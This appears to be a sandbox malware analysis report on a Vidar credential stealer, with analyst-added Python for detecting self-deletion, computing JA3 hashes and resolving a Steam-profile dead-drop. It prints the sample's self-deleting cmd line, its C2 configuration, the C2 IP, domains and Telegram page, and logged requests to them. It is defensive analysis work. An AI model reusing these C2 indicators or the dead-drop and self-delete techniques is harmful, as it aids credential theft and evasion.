
Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
Analysis ID:1511546
MD5:5a4ccccb90b0aaa3b248d4f0dde38823
SHA1:be8f1d791a81696cd58e7f837a97aaea58eeb26a
SHA256:b802eb0f4a10d4aecc9015ee86ddc9b1249212dcabc2ecb6aa97418d0de7722b
Tags:exe

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Self deletion via cmd or bat file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" MD5: 5A4CCCCB90B0AAA3B248D4F0DDE38823)
    • cmd.exe (PID: 6180 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6316 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "af458cf23e4b27326a35871876cc63d9"}
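
The cmd.exe child in the process tree above (PID 6180) is what the "Self deletion via cmd or bat file" signature fires on: `timeout /t 10` gives the parent time to exit and release its image, `del /f /q` removes the sample, and `rd /s /q` removes the working directory it created under C:\ProgramData. The following detection logic, written for this report and not part of Joe Sandbox or the sample, runs over process-creation events with a Sysmon-style field set (an assumed shape). It flags a cmd.exe only when the `del` target is the image of its own parent, so ordinary cleanup (the constructed installer events) does not match; matching `ping -n` as a delay primitive is a generalisation beyond what the report shows.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation event; the field set mirrors Sysmon Event ID 1 (assumed shape)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Delay primitive that precedes the delete. The sample uses `timeout /t 10`; `ping -n N`
# is matched too as a generalisation of what the report shows.
DELAY_RE = re.compile(r"\b(?:timeout\s+/t\s+\d+|ping\s+(?:-n|/n)\s+\d+)", re.IGNORECASE)
# `del [/switch ...] "<path>"` up to the next `&` or end of line; group 1 is the target.
DEL_RE = re.compile(r'\b(?:del|erase)\b(?:\s+/\w)*\s+"?([^"&]+?)"?\s*(?:&|$)', re.IGNORECASE)
# `rd|rmdir [/switch ...] "<dir>"`; group 1 is the directory removed.
RD_RE = re.compile(r'\b(?:rd|rmdir)\b(?:\s+/\w)*\s+"?([^"&]+?)"?\s*(?:&|$)', re.IGNORECASE)


def detect_self_delete(events):
    """Flag every cmd.exe whose command line deletes the image of its own parent process."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if not ev.image.lower().endswith("\\cmd.exe"):
            continue
        parent = by_pid.get(ev.ppid)
        if parent is None:
            continue
        m = DEL_RE.search(ev.cmdline)
        if not m:
            continue
        target = m.group(1).strip()
        if target.lower() != parent.image.lower():
            continue  # deleting some other file is ordinary cleanup, not self-deletion
        hits.append({
            "pid": ev.pid,
            "parent_pid": parent.pid,
            "deleted": target,
            "delayed": bool(DELAY_RE.search(ev.cmdline)),
            "dirs_removed": [d.strip() for d in RD_RE.findall(ev.cmdline)],
        })
    return hits


# Constructed events. PIDs, images and the cmd.exe command line are the ones in the
# process tree above; the installer events are made up as a benign control case.
SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
EVENTS = [
    ProcEvent(6924, 1000, SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(6180, 6924, r"C:\Windows\system32\cmd.exe",
              '"C:\\Windows\\system32\\cmd.exe" /c timeout /t 10 & del /f /q "' + SAMPLE
              + '" & rd /s /q "C:\\ProgramData\\AEGHIJEHJDHI" & exit'),
    ProcEvent(6316, 6180, r"C:\Windows\system32\timeout.exe", "timeout /t 10"),
    ProcEvent(7000, 1000, r"C:\Users\user\AppData\Local\Temp\setup.exe",
              '"C:\\Users\\user\\AppData\\Local\\Temp\\setup.exe" /S'),
    ProcEvent(7001, 7000, r"C:\Windows\system32\cmd.exe",
              'cmd.exe /c del /q "C:\\Users\\user\\AppData\\Local\\Temp\\setup.log"'),
]

if __name__ == "__main__":
    for hit in detect_self_delete(EVENTS):
        print(hit)
```

The parent/child join is what keeps the rule precise: `cmd /c ... del` alone is common in installers, while a child deleting the exact image its parent was started from is the stealer's cleanup. The `dirs_removed` field is worth keeping in the alert, because the removed directory (here C:\ProgramData\AEGHIJEHJDHI) is where the harvested data was staged and is the first place to look in forensics.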
Yara matches (memory dumps)
Source | Rule | Description | Author
00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Yara matches (unpacked PEs)
Source | Rule | Description | Author
0.2.SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe.2f0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-15T18:30:02.915417+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.12 | 49718 | 188.245.87.202 | 443 | TCP


          AV Detection

Source: https://steamcommunity.com/profiles/76561199747278259/badges | Avira URL Cloud: Label: malware
Source: https://t.me/armad2a | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259 | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259/inventory/ | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "af458cf23e4b27326a35871876cc63d9"}
Source: arpdabl.zapto.org | Virustotal: Detection: 12%
Source: http://arpdabl.zapto.org/s | Virustotal: Detection: 11%
Source: https://188.245.87.202/ | Virustotal: Detection: 15%
Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | ReversingLabs: Detection: 63%
Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Virustotal: Detection: 69%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F6CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F6D50 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F8980 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00300DF0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.50.98.133:443 -> 192.168.2.12:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49721 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F9D40 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00305A70 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00305EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_003056C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00304F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_003053C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen

          Networking

Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199747278259
Source: global traffic | HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /armad2a HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 188.245.87.202
Source: Joe Sandbox View | IP Address: 23.50.98.133
Source: Joe Sandbox View | IP Address: 149.154.167.99
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.12:49718 -> 188.245.87.202:443
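
The JA3 entries above deserve a caveat before anyone reads "Possible Dridex" as attribution. JA3 hashes only the shape of the TLS ClientHello (version, cipher list, extension list, curves, point formats), so it identifies the TLS stack that built the hello rather than the program driving it; this sample does its HTTP through WinINet (the 0_2_002F5010 function listed below), so the hello is the one the Windows TLS stack produces, and every other WinINet client on that Windows build gets the same hash. That is why the abuse.ch JA3 rule fires at severity 3 and why the report lists the hash as "seen in connection with other malware" rather than as a Vidar indicator. The block below, added here and not part of Joe Sandbox or Suricata, builds the JA3 string and hash from already-parsed ClientHello fields, including the GREASE stripping that makes two consecutive browser connections hash identically. The field values are constructed for illustration and are not the sample's real ClientHello, so the result will not equal 37f463bf4616ecd445d4a1937da06e19.

```python
import hashlib


def is_grease(value):
    """RFC 8701 GREASE values: 0x0a0a, 0x1a1a, ..., 0xfafa (both bytes equal, low nibble 0xa)."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def ja3_string(version, ciphers, extensions, curves, point_formats):
    """Build the JA3 input: SSLVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats.

    Every value is decimal, lists are '-'-joined in ClientHello order (order is part of the
    fingerprint), and GREASE values are dropped from ciphers, extensions and curves because
    browsers randomise them per connection.
    """
    def join(values, drop_grease=True):
        return "-".join(str(v) for v in values if not (drop_grease and is_grease(v)))

    return ",".join([
        str(version),
        join(ciphers),
        join(extensions),
        join(curves),
        join(point_formats, drop_grease=False),
    ])


def ja3_hash(version, ciphers, extensions, curves, point_formats):
    """JA3 = MD5 of the JA3 string (MD5 serves as a fast non-cryptographic digest here)."""
    s = ja3_string(version, ciphers, extensions, curves, point_formats)
    return hashlib.md5(s.encode("ascii")).hexdigest()


# Constructed ClientHello fields (already parsed out of the handshake). The cipher and
# extension lists are illustrative and are NOT the sample's real ClientHello, so the
# resulting hash will not equal the 37f463bf... value in the report.
HELLO_A = dict(
    version=0x0303,                                    # TLS 1.2 -> "771"
    ciphers=[0x1A1A, 49196, 49195, 49200, 49199, 156, 47],
    extensions=[0x2A2A, 0, 5, 10, 11, 13, 23, 65281],  # server_name first, renegotiation_info last
    curves=[0x4A4A, 29, 23, 24],
    point_formats=[0],
)
# Same stack, next connection: only the GREASE values changed.
HELLO_B = dict(HELLO_A,
               ciphers=[0xFAFA, 49196, 49195, 49200, 49199, 156, 47],
               extensions=[0x0A0A, 0, 5, 10, 11, 13, 23, 65281],
               curves=[0xBABA, 29, 23, 24])

if __name__ == "__main__":
    print(ja3_string(**HELLO_A))
    print(ja3_hash(**HELLO_A), ja3_hash(**HELLO_B))
```

Note what is absent from the string: the SNI, the destination IP and anything about the process. A JA3 match therefore tells you which TLS library spoke, and attribution needs the pairing the report actually provides elsewhere, namely the configuration extractor output and the connection to 188.245.87.202 made without a DNS query.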
Source: unknown | TCP traffic detected without corresponding DNS query: 188.245.87.202 (14 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 datagrams)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F5010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /armad2a HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Both requests carry no User-Agent header (signature: HTTP GET or POST without a user agent).
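
The networking entries above describe a dead-drop resolver rather than a direct C2: the extracted configuration's "C2 url" is a public Steam profile, the sample fetches it (and the Telegram page t.me/armad2a), the saved profile page 76561199747278259[1].htm contains the string https://188.245.87.202, and the sample then opens TLS connections to 188.245.87.202 with no DNS query because it already holds the IP. The block below, added for this report and not code from the sample or from Joe Sandbox, shows the analyst-side version of that step: scrape IP-literal URLs from a fetched page, discard loopback and private addresses, and confirm a candidate by matching it against connections the sandbox saw without a preceding DNS lookup. The profile HTML is constructed (the persona-name markup is an assumption about Steam's page; only the 188.245.87.202 literal comes from the report), and the pairing of 23.50.98.133 with steamcommunity.com and 149.154.167.99 with t.me is assumed from the DNS queries and HTTPS destinations the report lists.

```python
import ipaddress
import re
from html import unescape

# Constructed excerpt of a Steam profile page. The persona-name markup is an assumption
# about Steam's HTML; the literal https://188.245.87.202 is what the report found in the
# dropped file 76561199747278259[1].htm, and the 127.0.0.1:27060 URLs (from Steam's own
# CSP header, quoted in the report) are included as distractors that must be ignored.
PROFILE_HTML = """<html><head><title>Steam Community :: profile</title></head><body>
<!-- connect-src 'self' https://community.akamai.steamstatic.com/ http://127.0.0.1:27060 ws://127.0.0.1:27060 -->
<div class="profile_header_content">
  <span class="actual_persona_name">https://188.245.87.202/</span>
</div>
<a href="http://store.steampowered.com/privacy_agreement/">Privacy Policy</a>
</body></html>"""

URL_HOST_RE = re.compile(r"""(?:https?|wss?)://([^/\s"'<>]+)""")


def ip_literal_hosts(html):
    """Return public IPs that appear as bare IP-literal hosts in URLs, in page order."""
    found = []
    for m in URL_HOST_RE.finditer(unescape(html)):
        host = m.group(1).rsplit(":", 1)[0]        # strip an optional :port
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue                                # hostname, not an IP literal
        if ip.is_global and str(ip) not in found:   # drops loopback/private/reserved
            found.append(str(ip))
    return found


# Constructed connection list after the report's network section: destination, port and the
# DNS name the sandbox saw resolved before the connection (None = no matching DNS query).
# Pairing 23.50.98.133 with steamcommunity.com and 149.154.167.99 with t.me is an assumption
# from the DNS queries and HTTPS destinations listed in the report.
CONNECTIONS = [
    {"dst": "23.50.98.133", "port": 443, "resolved_from": "steamcommunity.com"},
    {"dst": "149.154.167.99", "port": 443, "resolved_from": "t.me"},
    {"dst": "188.245.87.202", "port": 443, "resolved_from": None},
]


def resolve_dead_drop(profile_html, connections):
    """Link IP literals scraped from the dead-drop page to connections made without DNS."""
    candidates = set(ip_literal_hosts(profile_html))
    return [c["dst"] for c in connections
            if c["resolved_from"] is None and c["dst"] in candidates]


if __name__ == "__main__":
    print("dead-drop C2 candidates:", ip_literal_hosts(PROFILE_HTML))
    print("confirmed by no-DNS connections:", resolve_dead_drop(PROFILE_HTML, CONNECTIONS))
```

The practical consequence for blocking is that the domains in the configuration (steamcommunity.com, t.me) are legitimate services and cannot be sinkholed; the actionable indicator is the IP the page resolves to, and it can be rotated by editing the profile, so the "TCP traffic without corresponding DNS query" behaviour is the more durable detection hook.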
Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
The same dump holds two further partial copies of this header (one prefixed "P3PV1/settings: always=a session=a", one beginning "t-Security-Policy:"), both truncated after "https://steambroadcast-te" and matching the same www.youtube.com (Youtube) check.
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: arpdabl.zapto.org
Strings found in binary or memory (memory dumps belong to process SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe; 76561199747278259[1].htm.0.dr is the dropped Steam profile page):

Source: 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp
  http://127.0.0.1:27060
  https://api.steampowered.com/
  https://broadcast.st.dl.eccdnx.com
  https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
  https://checkout.steampowered.com/
  https://community.akamai.steamstatic.com/

Source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp
  http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont

Source: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
  http://arpdabl.zapto
  http://arpdabl.zapto.
  http://arpdabl.zapto..5938.149
  http://arpdabl.zapto.org
  http://arpdabl.zapto.org38.149
  http://arpdabl.zapto0.5938.149
  http://store.steampowered.com/privacy_agreemen

Source: 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp
  http://arpdabl.zapto.org/
  http://arpdabl.zapto.org/D
  http://arpdabl.zapto.org/n
  http://arpdabl.zapto.org/s
  https://188.245.87.202/

Source: 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp
  https://188.245.87.202/0
  https://188.245.87.202/T
  https://188.245.87.202/c

Source: 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
  https://188.245.87.202/rosoft

Source: 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmp
  https://api.steampower

Source: 76561199747278259[1].htm.0.dr
  https://188.245.87.202
  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg

Source: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.dr
  https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=WG6XPcWBZkQp&a

Source: 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.dr
  http://store.steampowered.com/account/cookiepreferences/
  http://store.steampowered.com/privacy_agreement/
  http://store.steampowered.com/subscriber_agreement/
  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
  https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=puGcKUBV
  https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WRaH
  https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
  https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl

Source: the four sources above plus 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp
  http://www.valvesoftware.com/legal.htm
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
